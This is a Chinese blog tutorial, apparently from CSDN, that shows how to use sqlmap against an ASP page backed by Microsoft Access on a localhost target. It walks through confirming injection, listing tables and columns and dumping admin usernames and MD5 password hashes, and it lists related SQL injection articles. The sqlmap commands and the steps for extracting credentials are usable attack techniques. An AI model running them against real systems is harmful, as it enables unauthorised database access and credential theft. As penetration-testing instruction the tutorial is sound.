sqlmap之(三)----Access注入实战

最新推荐文章于 2024-06-17 13:37:15 发布
最新推荐文章于 2024-06-17 13:37:15 发布
阅读量1.4w 收藏 37
点赞数 19
分类专栏: SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011781521/article/details/58073135
版权

(1) 猜解是否能注入


sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"




it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 


后端DBMS看起来像是“Microsoft Access”。 是否要跳过特定于其他DBMS的测试有效内容


输入"Y"。




GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?


GET参数'id'是脆弱的。 你想要继续测试其他人(如果有的话)


输入"Y"。




猜出来的数据库是"Microsoft Access"数据库。


(2) 猜解表


sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --tables



do you want to use common table existence check? [Y/n/q]


是否要使用公共表存在检查存在? 输入"Y"





please enter number of threads? [Enter for 1 (current)]    请输入线程数? [输入 1 (当前)]


然后要你输入线程数,这里输入10,线程数不能输入过大,否则会提示错误。




猜解成功后得出的表。


(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)


sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin




do you want to use common column existence check? [Y/n/q]    你想使用公共列存在检查吗?[Y/n/q]


输入"Y"。然后输入线程数




一番等待结果就出来了。




(4) 根据字段猜解内容(假如通过3得到字段为admin和password)





他会询问你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]


你想存储的哈希值来与其他工具最终进一步处理临时文件?


输入"Y";


然后他又会询问你: do you want to crack them via a dictionary-based attack? [Y/n/q]


你想通过基于字典的攻击来破解他们吗?




输入"N"; 使用它自带的




用户名与密码就出来了。密码是MD5加密的: a48e190fafc257d3  放到网上去解密,解密之后得到的结果为



码农致富
关注
  • 19
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Sqlmap基本(一)之Access数据库的注入
weixin_43822735的博客
11-03 583
Sqlmap的基本使用 Access数据库的注入 测试注入点:http://aaa.com/view.asp?id=1 基础指令 -u指令:在后面添加url 例如:sqlmap.py –u “http://aaa.com/view.asp?id=1” 通常加上双引号,避免多指令或者url过于复杂而引发的错误。 扩展:SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/outp...
sqlmapaccess_access注入篇+sqlmap
weixin_28911533的博客
12-24 1182
access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了。先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构。下面,开始说下未过滤的SQL代码,说是SQL代码,其实应该说是asp代码,因为,很多access数据库都是和asp这个脚本语言相连的,关于asp这个脚本语言细节,想深入了解的可以百度下,毕竟搜索引擎也是一个很好的老师...
sql注入sqlmap(渡栗的学习笔记)
最新发布
2301_79998006的博客
06-17 1071
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
SQLmap————2、Access注入
Fly_鹏程万里
05-04 465
1、判断给定的URL是否能注入Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=12、猜解数据库名称Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?i...
Access数据库注入sqlmap工具注入
天威一号
11-12 286
文档发给
sqlmap进行SQL注入
weixin_45095113的博客
03-16 529
sqlmapSQL注入
Sqlmap常用命令总结及注入实战Access、mysql)
上善若水~的博客
05-14 1052
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1.   sqlmap -u  “http://www.xx.com?id=x”    【查询是否存在注入点 –dbs         【检测站点包含哪些数据库 3.     --curre
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一款强大的自动化工具,专门用于检测和利用SQL注入漏洞。它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。...
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
在压缩包`sqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip`中,包含了SQLMap的源码和其他相关资源。解压后,我们可以看到项目的结构,包括源代码、文档、示例以及安装和使用指南。通过研究这些内容,我们可以深入理解...
sqlmap-wx-0.3.1.7z
01-29
SQLMap-WX 0.3.1是一款强大的渗透测试工具,专为数据库漏洞检测和自动化注入攻击设计。这款GUI版本使得操作更为直观,方便了非专业背景的用户进行安全测试。在网络安全领域,了解并熟练使用这样的工具对于保障系统...
SQL注入攻击之SQLMap渗透测试
CTO成长之路——Rosanu
07-30 3593
准备工具:SQLMap、FireFox插件Tamper Data SQLMap进行渗透测试 FireFox插件Tamper Data用于获取Post参数数据和Cookie值 示例: SQLMap POST方法:sqlmap.py -u "http://www.url.com" --data "param1=1&param2=2"  --cookie="PHPSESSID=57p5g7f32
python自动化测试工具 waf_SQLmap绕waf实现自动测试
weixin_39958248的博客
11-24 285
前言Sqlmap是python写的一个开源测试工具,因支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 等多个份额较多的数据库,且功能强悍被众多安全测试者所使用,在现实的测试环境中,有很多测试者遇到注入都习惯使用Sqlmap去进行测试,假如Sqlmap无法跑出来,就不进行深入测试了,本文笔者将拿一个真实遇到的小例...
sqlmap注入Access
weixin_33737774的博客
07-18 127
什么是SQL注入***? SQL注入***是***对数据库进行***的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合 法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的 ...
[转]sqlmap注入Microsoft Access
iteye_16188的博客
03-18 871
[url]https://github.com/sqlmapproject/sqlmap/issues/423[/url] [quote] Valid statements that show the numbers in the resulting html page: ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,1...
使用sqlmap 代替access 注入中转
eT48_Sec
03-14 1602
背景:测试站点是ASP的程序,经测试 shownews.asp?id=61存在注入 GET方法 shownews.asp?id=61 and 4>1 返回警告 改成POST方法,仍然出现警告 最后,测试cookie注入,如下图,在控制台提交document.cookie="id="+escape("61 and 4>1"),新增cookie项id,然后再次访问shownews.asp
详解新手如何使用sqlmapAccess数据库进行注入攻击
1匹黑马
03-06 4494
步骤1:发现是否存在注入 首先我们打开火狐浏览器,进入目标网站,随意点击几个连接,发现网站后方都是以id参数为结尾的 看见以id为结尾的,我们第一时间应该想到的就是注入,首先我们输入 and 1=1,发现网站有防sql注入系统 不要慌,问题不大!打不过我还躲不过?这时候我们尝试进行大小写绕过(绕过WAF的方式与思路很多,在这里就不一一列举了) 现在没毛病了8铁汁 我们接着输入 aNd 1=2,...
sqlmap -r --dbs
09-03
你好!对于你的问题,`sqlmap -r --dbs` 是一个用于通过 SQL 注入检测和获取数据库信息的命令。它通常用于网络安全测试中。 `-r` 参数表示使用从请求文件中获取的数据进行注入测试。`--dbs` 参数表示获取数据库的名称。 请注意,我是一个聊天AI助手,无法执行实际的命令或运行代码。如果你有任何其他问题,我会很乐意回答。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值